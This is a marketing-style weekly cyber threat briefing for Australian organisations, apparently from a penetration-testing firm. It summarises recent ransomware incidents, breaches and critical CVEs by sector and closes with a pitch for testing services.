As a senior penetration tester actively analysing adversary behaviour and responding to frontline incidents, I am tracking a highly volatile threat landscape across Australia. Over the past seven days leading up to 22 March 2026, the window between vulnerability disclosure and active exploitation has collapsed to mere days. A recent industry survey reveals that "cyber breach fatigue" is setting in among the Australian public, while 70% of local organisations report being impacted by AI-led attacks over the last year. Adversaries are aggressively weaponising artificial intelligence, exploiting cloud misconfigurations, and capitalising on critical zero-day vulnerabilities in web applications and APIs.

Here is your weekly threat briefing detailing the active exploits, prominent threat actors, and critical vulnerabilities impacting Australian organisations across key sectors.

Sector Threat Analysis

Healthcare The healthcare sector remains under intense siege from double-extortion ransomware. A joint advisory from the Australian Cyber Security Centre (ACSC) warned of the INC Ransom group breaching over 11 Australian organisations. Affiliates operating this Ransomware-as-a-Service (RaaS) are using legitimate administrative tools like 7-Zip and rclone to blend into normal network traffic and bypass basic defences. Concurrently, the SafePay ransomware gang recently targeted an Australian orthodontics provider, publishing staff details and patient payment plans to the dark web to force extortion payments.

SaaS Providers & Government Supply chain and cloud vulnerabilities took centre stage following a major data breach involving a global legal intelligence SaaS provider. A threat actor tracked as 'FulcrumSec' breached the provider's AWS cloud environment by exploiting "React2Shell"—a critical vulnerability in an unpatched web application. This supply chain attack exposed highly sensitive data belonging to Australian law firms and federal government agencies. Furthermore, recent audits have revealed severe Microsoft 365 cloud misconfigurations within state government departments, including a critical lack of Data Loss Prevention (DLP) controls.

eCommerce Digital retail and physical supply chains are facing cascading disruptions. Attackers recently leaked data stolen from major Australian poultry processor Hazeldenes, while the Kairos ransomware group disrupted consumer-facing commerce by breaching the Seagrass Boutique Hospitality Group. Exploited web application vulnerabilities and poorly secured APIs remain the primary initial access vectors for these financially motivated threat actors.

FinTech Proactive cyber resilience is now a strictly enforced regulatory expectation in Australia. This week, ASIC imposed a landmark AUD 2.5 million penalty on FIIG Securities for historical cybersecurity governance failures. With established threat groups like Akira and Qilin accounting for 45% of recent ransomware incidents, FinTech organisations must urgently secure their cloud infrastructure and financial APIs to defend against sophisticated extortion and comply with the mandatory reporting requirements of the Cyber Security Act.

Education / EdTech Higher education institutions and EdTech platforms are actively being targeted via CVE-2026-1731, a critical pre-authentication Remote Code Execution (RCE) vulnerability in BeyondTrust remote support software. Threat actors are exploiting this flaw to bypass perimeter defences and establish persistent footholds within self-hosted educational environments.

IoT The ACSC and the Five Eyes intelligence alliance issued an emergency directive regarding CVE-2026-20127, a maximum-severity (CVSS 10.0) authentication bypass vulnerability in Cisco Catalyst SD-WAN products. Actively exploited by a sophisticated threat actor dubbed UAT-8616, this flaw allows attackers to gain administrative privileges, create rogue local accounts, and establish persistent access across distributed IoT networks and critical edge-facing infrastructure.

AI Systems We are seeing the real-world impact of AI vulnerabilities expanding the attack surface. Researchers recently uncovered CVE-2026-0628, a high-severity security flaw in Google Chrome’s implementation of its Gemini AI feature. This vulnerability allowed malicious extensions to hijack the AI panel, tap into the browser environment, and access local operating system files. This highlights the urgent need to apply strict identity, privilege, and monitoring disciplines to AI-integrated systems.

Conclusion

The current threat landscape demands a paradigm shift. Traditional, reactive security approaches are obsolete against adversaries operating at machine speed. Australian organisations must urgently prioritise proactive exposure management, rigorous API testing, and continuous cloud security posture monitoring to build true resilience.

Contact us for a quote for penetration testing service or adversary simulation.